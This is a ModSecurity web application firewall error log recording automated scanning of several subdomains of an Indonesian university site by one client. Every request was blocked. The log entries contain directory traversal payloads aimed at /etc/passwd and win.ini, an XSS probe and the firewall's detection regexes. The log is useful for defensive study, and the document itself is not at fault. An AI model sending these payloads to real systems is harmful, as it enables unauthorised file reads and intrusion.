[Tue Aug 29 11:45:20.372121 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO134MCo-f0AAAfg78UAAAAe"]
[Tue Aug 29 11:45:20.383479 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAARphK4AAAAU"]
[Tue Aug 29 11:45:20.401093 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAAhzvaoAAAAx"]
[Tue Aug 29 11:45:20.403037 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAAhuix0AAAAr"]
[Tue Aug 29 11:45:20.408559 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAAhoHMEAAAAl"]
[Tue Aug 29 11:45:20.411735 2023] [:error] [pid 2167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAAh3f7gAAAA1"]
[Tue Aug 29 11:45:20.413326 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO134MCo-f0AAAhgoHcAAAAb"]
[Tue Aug 29 11:45:21.424341 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134cCo-f0AAAdQ3zcAAAAV"]
[Tue Aug 29 11:45:23.358757 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAh13wEAAAAz"]
[Tue Aug 29 11:45:23.361318 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO1348Co-f0AAAhuiyEAAAAr"]
[Tue Aug 29 11:45:23.365217 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAhkLgAAAAAh"]
[Tue Aug 29 11:45:23.370514 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAhxwm8AAAAv"]
[Tue Aug 29 11:45:23.375383 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAg-pPAAAAAR"]
[Tue Aug 29 11:45:23.388002 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1348Co-f0AAAhkLgEAAAAh"]
[Tue Aug 29 11:45:23.388242 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1348Co-f0AAAfbkxIAAAAZ"]
[Tue Aug 29 11:45:23.391482 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1348Co-f0AAAe3@K8AAAAA"]
[Tue Aug 29 11:45:23.394677 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAhtjdAAAAAq"]
[Tue Aug 29 11:45:24.367494 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAhtjdEAAAAq"]
[Tue Aug 29 11:45:24.370608 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAhzvbAAAAAx"]
[Tue Aug 29 11:45:24.371585 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO135MCo-f0AAAh13wMAAAAz"]
[Tue Aug 29 11:45:24.372809 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAfSWjoAAAAB"]
[Tue Aug 29 11:45:24.378371 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAfEB1wAAAAO"]
[Tue Aug 29 11:45:24.389508 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAhvjWwAAAAs"]
[Tue Aug 29 11:45:24.392298 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO135MCo-f0AAAg-pPMAAAAR"]
[Tue Aug 29 11:45:24.392410 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO135MCo-f0AAAhtjdIAAAAq"]
[Tue Aug 29 11:45:24.411615 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135MCo-f0AAAfSWjsAAAAB"]
[Tue Aug 29 11:45:25.357714 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAhzvbIAAAAx"]
[Tue Aug 29 11:45:25.358126 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAAhT3xkAAAAD"]
[Tue Aug 29 11:45:25.360709 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135cCo-f0AAAh4DZAAAAA2"]
[Tue Aug 29 11:45:25.373512 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135cCo-f0AAAhkLgMAAAAh"]
[Tue Aug 29 11:45:25.383689 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAhoHMsAAAAl"]
[Tue Aug 29 11:45:25.385022 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAhhcxcAAAAd"]
[Tue Aug 29 11:45:25.392901 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAgzyUQAAAAF"]
[Tue Aug 29 11:45:25.394574 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135cCo-f0AAAg-pPQAAAAR"]
